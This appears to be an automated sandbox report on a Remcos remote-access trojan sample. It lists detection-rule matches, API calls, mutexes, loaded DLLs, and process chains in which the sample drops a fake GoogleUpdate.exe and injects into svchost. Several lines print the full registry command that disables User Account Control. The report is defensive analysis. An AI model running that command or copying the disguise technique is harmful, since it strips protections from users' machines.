                  Source: 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000F.00000000.1756098739.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: Process Memory Space: DB5rQYsfd6.exe PID: 7308, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: GoogleUpdate.exe PID: 7888, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: svchost.exe PID: 7944, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: GoogleUpdate.exe PID: 8112, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: GoogleUpdate.exe PID: 8180, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: GoogleUpdate.exe PID: 1184, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: GoogleUpdate.exe PID: 1608, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: GoogleUpdate.exe PID: 7592, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: GoogleUpdate.exe PID: 7844, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@26/4@49/1
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00415C90
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,10_2_00415C90
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D65C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,13_2_02D65C90
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,15_2_00415C90
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,18_2_00415C90
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,0_2_0040E2E7
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,0_2_00419493
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00418A00
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Attempt-S4A0CI-W
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeMutant created: \Sessions\1\BaseNamedObjects\Attempt-S4A0CI
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeFile created: C:\Users\user\AppData\Local\Temp\install.vbsJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: Software\0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: Attempt-S4A0CI0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: Exe0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: Exe0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: Attempt-S4A0CI0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: (#G0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: Inj0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: Inj0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: Inj0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: Attempt-S4A0CI0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: origmsc0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: h5S0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: h5S0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: h5S0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: @8T0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: h5S0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: exepath0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: @8T0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: exepath0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: h5S0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: licence0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: `"G0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: Administrator0_2_0040D3F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCommand line argument: User0_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: Software\10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: Attempt-S4A0CI10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: Exe10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: Exe10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: Attempt-S4A0CI10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: (#G10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: Inj10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: Inj10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: Inj10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: Attempt-S4A0CI10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: origmsc10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: 0gj10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: 0gj10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: 0gj10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: H"G10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: 0gj10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: exepath10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: H"G10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: exepath10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: 0gj10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: licence10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: `"G10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: Administrator10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: User10_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: Software\18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: 0"G18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: Exe18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: 0"G18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: (#G18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: Inj18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: Inj18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: Inj18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: 0"G18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: origmsc18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: !G18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: !G18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: !G18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: H"G18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: !G18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: exepath18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: H"G18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: exepath18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: !G18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: licence18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: `"G18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: Administrator18_2_0040D3F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCommand line argument: User18_2_0040D3F0
                  Source: DB5rQYsfd6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: DB5rQYsfd6.exeReversingLabs: Detection: 89%
                  Source: DB5rQYsfd6.exeVirustotal: Detection: 84%
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeFile read: C:\Users\user\Desktop\DB5rQYsfd6.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\DB5rQYsfd6.exe "C:\Users\user\Desktop\DB5rQYsfd6.exe"
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeProcess created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\GoogleDat\GoogleUpdate.exe C:\ProgramData\GoogleDat\GoogleUpdate.exe
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeProcess created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                  Source: unknownProcess created: C:\ProgramData\GoogleDat\GoogleUpdate.exe "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
                  Source: unknownProcess created: C:\ProgramData\GoogleDat\GoogleUpdate.exe "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
                  Source: unknownProcess created: C:\ProgramData\GoogleDat\GoogleUpdate.exe "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
                  Source: unknownProcess created: C:\ProgramData\GoogleDat\GoogleUpdate.exe "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
                  Source: unknownProcess created: C:\ProgramData\GoogleDat\GoogleUpdate.exe "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
                  Source: unknownProcess created: C:\ProgramData\GoogleDat\GoogleUpdate.exe "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeProcess created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\GoogleDat\GoogleUpdate.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\GoogleDat\GoogleUpdate.exe C:\ProgramData\GoogleDat\GoogleUpdate.exeJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeProcess created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
